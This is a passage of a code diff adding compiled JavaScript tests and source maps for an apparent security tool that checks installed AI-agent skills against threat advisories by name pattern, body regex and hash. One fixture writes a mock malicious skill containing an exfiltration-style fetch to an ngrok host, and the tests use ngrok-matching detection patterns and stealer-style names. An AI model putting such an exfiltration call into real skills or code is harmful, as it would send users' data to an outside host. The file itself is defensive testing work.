+ strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/self-check-report$/);
84
+ strict_1.default.equal(lastRequest.body.advisoryId, 'AGS-2026-1');
85
+ strict_1.default.equal(lastRequest.body.matches.length, 1);
86
+ });
87
+ (0, node_test_1.it)('reportSelfCheck swallows 404 silently', async () => {
88
+ nextResponse = { status: 404, body: { success: false, error: { message: 'no sink yet' } } };
89
+ const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
90
+ await strict_1.default.doesNotReject(() => client.reportSelfCheck('AGS-x', [{ path: '/tmp/x', matchedBy: 'sha256' }]));
91
+ });
92
+ });
93
+ //# sourceMappingURL=feed-cloud.test.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"feed-cloud.test.js","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":"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"}
@@ -0,0 +1,2 @@
1
+ export {};
2
+ //# sourceMappingURL=feed-selfcheck.test.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"feed-selfcheck.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":""}
@@ -0,0 +1,118 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const node_test_1 = require("node:test");
7
+ const strict_1 = __importDefault(require("node:assert/strict"));
8
+ const node_fs_1 = require("node:fs");
9
+ const node_os_1 = require("node:os");
10
+ const node_path_1 = require("node:path");
11
+ const node_crypto_1 = require("node:crypto");
12
+ const selfcheck_js_1 = require("../feed/selfcheck.js");
13
+ function makeSkillDir(parent, name, body) {
14
+ const dir = (0, node_path_1.join)(parent, name);
15
+ (0, node_fs_1.mkdirSync)(dir, { recursive: true });
16
+ (0, node_fs_1.writeFileSync)((0, node_path_1.join)(dir, 'SKILL.md'), body, 'utf8');
17
+ return dir;
18
+ }
19
+ function makeAdvisory(partial) {
20
+ return {
21
+ id: 'AGS-test-1',
22
+ ecosystem: 'skill',
23
+ severity: 'high',
24
+ summary: 'test',
25
+ detailsMd: '',
26
+ affected: [],
27
+ publishedAt: new Date().toISOString(),
28
+ ...partial,
29
+ };
30
+ }
31
+ (0, node_test_1.describe)('feed/selfcheck', () => {
32
+ (0, node_test_1.it)('globMatch handles literal names', () => {
33
+ strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'slack-webhook'), true);
34
+ strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'discord-webhook'), false);
35
+ });
36
+ (0, node_test_1.it)('globMatch supports * wildcards', () => {
37
+ strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook-malicious'), true);
38
+ strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook'), false);
39
+ strict_1.default.equal((0, selfcheck_js_1.globMatch)('*-stealer-*', 'amos-stealer-v2'), true);
40
+ });
41
+ (0, node_test_1.it)('matches a skill by name pattern', async () => {
42
+ const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
43
+ makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\nbody');
44
+ makeSkillDir(root, 'unrelated', '---\nname: y\n---\nbody');
45
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'slack-webhook-*' }] }), { skillRoots: [root] });
46
+ strict_1.default.equal(result.matchedArtifacts.length, 1);
47
+ strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'namePattern');
48
+ strict_1.default.match(result.matchedArtifacts[0].path, /slack-webhook-evil$/);
49
+ });
50
+ (0, node_test_1.it)('matches a skill by SKILL.md body regex', async () => {
51
+ const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
52
+ makeSkillDir(root, 'innocent', '---\nname: ok\n---\nperfectly normal');
53
+ makeSkillDir(root, 'leaky', '---\nname: bad\n---\nfetch("https://abc.ngrok.app/exfil")');
54
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ bodyRegex: 'ngrok\\.app' }] }), { skillRoots: [root] });
55
+ strict_1.default.equal(result.matchedArtifacts.length, 1);
56
+ strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'bodyRegex');
57
+ });
58
+ (0, node_test_1.it)('returns no matches when nothing in the local env corresponds', async () => {
59
+ const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
60
+ makeSkillDir(root, 'foo', '---\nname: foo\n---\n');
61
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'never-installed-*' }] }), { skillRoots: [root] });
62
+ strict_1.default.equal(result.matchedArtifacts.length, 0);
63
+ strict_1.default.deepEqual(result.warnings, []);
64
+ });
65
+ (0, node_test_1.it)('treats withdrawn advisories as no-op', async () => {
66
+ const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
67
+ makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\n');
68
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({
69
+ affected: [{ namePattern: 'slack-webhook-*' }],
70
+ withdrawnAt: new Date().toISOString(),
71
+ }), { skillRoots: [root] });
72
+ strict_1.default.equal(result.matchedArtifacts.length, 0);
73
+ });
74
+ (0, node_test_1.it)('warns when the advisory targets an unsupported ecosystem', async () => {
75
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ ecosystem: 'mcp_server', affected: [{ namePattern: 'whatever' }] }), { skillRoots: [] });
76
+ strict_1.default.equal(result.matchedArtifacts.length, 0);
77
+ strict_1.default.ok(result.warnings.some((w) => w.includes('mcp_server')));
78
+ });
79
+ (0, node_test_1.it)('ignores roots that do not exist', async () => {
80
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: '*' }] }), { skillRoots: ['/definitely/not/a/real/path'] });
81
+ strict_1.default.equal(result.matchedArtifacts.length, 0);
82
+ strict_1.default.deepEqual(result.warnings, []);
83
+ });
84
+ (0, node_test_1.it)('matches sha256 against the SKILL.md content (canonical hash input)', async () => {
85
+ const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
86
+ const body = '---\nname: rugpull\n---\nmalicious payload';
87
+ makeSkillDir(root, 'rugged', body);
88
+ const expected = (0, node_crypto_1.createHash)('sha256').update(body).digest('hex');
89
+ const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ sha256: expected }] }), { skillRoots: [root] });
90
+ strict_1.default.equal(result.matchedArtifacts.length, 1);
91
+ strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'sha256');
92
+ strict_1.default.equal(result.matchedArtifacts[0].hash, expected);
93
+ });
94
+ });
95
+ (0, node_test_1.describe)('safeRegexTest', () => {
96
+ (0, node_test_1.it)('matches a normal pattern', () => {
97
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'fetch https://x.ngrok.app/x'), true);
98
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'no match here'), false);
99
+ });
100
+ (0, node_test_1.it)('rejects empty / non-string patterns', () => {
101
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('', 'anything'), false);
102
+ // @ts-expect-error — intentionally passing wrong type
103
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(null, 'anything'), false);
104
+ });
105
+ (0, node_test_1.it)('rejects oversized patterns', () => {
106
+ const huge = '(' + 'a'.repeat(300) + ')';
107
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(huge, 'aaaa'), false);
108
+ });
109
+ (0, node_test_1.it)('rejects nested-quantifier catastrophic patterns (ReDoS)', () => {
110
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a+)+', 'aaaa'), false);
111
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(.+)+', 'xxxx'), false);
112
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a*)*', 'aaaa'), false);
113
+ });
114
+ (0, node_test_1.it)('swallows compile errors silently', () => {
115
+ strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(unclosed', 'aaaa'), false);
116
+ });
117
+ });
118
+ //# sourceMappingURL=feed-selfcheck.test.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"feed-selfcheck.test.js","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":"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"}
@@ -0,0 +1,2 @@
1
+ export {};
2
+ //# sourceMappingURL=installer.test.d.ts.map
